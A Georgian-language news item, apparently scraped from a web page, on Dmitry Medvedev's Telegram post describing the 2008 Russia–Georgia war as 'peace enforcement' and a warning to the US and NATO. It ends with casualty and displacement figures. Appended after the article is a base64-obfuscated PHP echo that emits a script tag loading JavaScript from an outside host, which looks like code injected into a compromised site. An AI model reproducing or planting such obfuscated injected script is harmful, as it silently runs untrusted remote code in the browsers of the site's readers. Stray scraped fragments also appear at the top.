celsiusi
ავერსი საქკაბელი
რუსეთის უშიშროების საბჭოს თავჯდომარის მოადგილე, დიმიტრი მედვედევი აგვისტოს ომს ეხმაურება და მას "მშვიდობის იძულების ქმედებების განხორციელებას" უწოდებს, რის მიზეზდაც "მოქალაქეების დაცვას" ასახელებს. 
 
მედვედევი Telegram-ზე წერს, რომ ამავე დროს ეს იყო აშშ-სა და ნატო-სთვის სიგნალი:
 
"2008 წლის აგვისტოში საქართველოს მშვიდობის იძულების ქმედებები განხორციელდა მოქალაქეების დასაცავად.
 
ამავე დროს ეს იყო სიგნალი აშშ-სა და ნატო-სთვის რუსეთის შეშფოთების გათვალისწინების აუცილებლობის შესახებ.
 
სიტუაცია კავკასიაში შეიცვალა. მაგრამ აშშ-მ და ნატო-მ ვერ გაიგეს და ვერ მიხვდნენ. განაგრძეს თავიანთი უკიდურესად საშიში კურსი.
 
2022 წელს უფრო მკაცრი პასუხის გაცემა მოგვიწია. ახლა მთელი მსოფლიო შეუქცევად შეიცვალა..." - წერს მედვედევი. 
 
შეგახსენებთ, რომ აგვისტოს 5-დღიანი ომიდან 14 წელი გავიდა. 2008 წლის რუსული საოკუპაციო ძალების ინტერვენციის შედეგად 228 მშვიდობიანი მოქალაქე, 170 სამხედრო და 14 პოლიციელი დაიღუპა. საქართველოს 2 232 მოქალაქე დაიჭრა და დაშავდა; საქართველოს ტერიტორიაზე 263 598 დევნილია; საქართველომ კონტროლი დაკარგა 151 დასახლებულ პუნქტზე. 
448
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");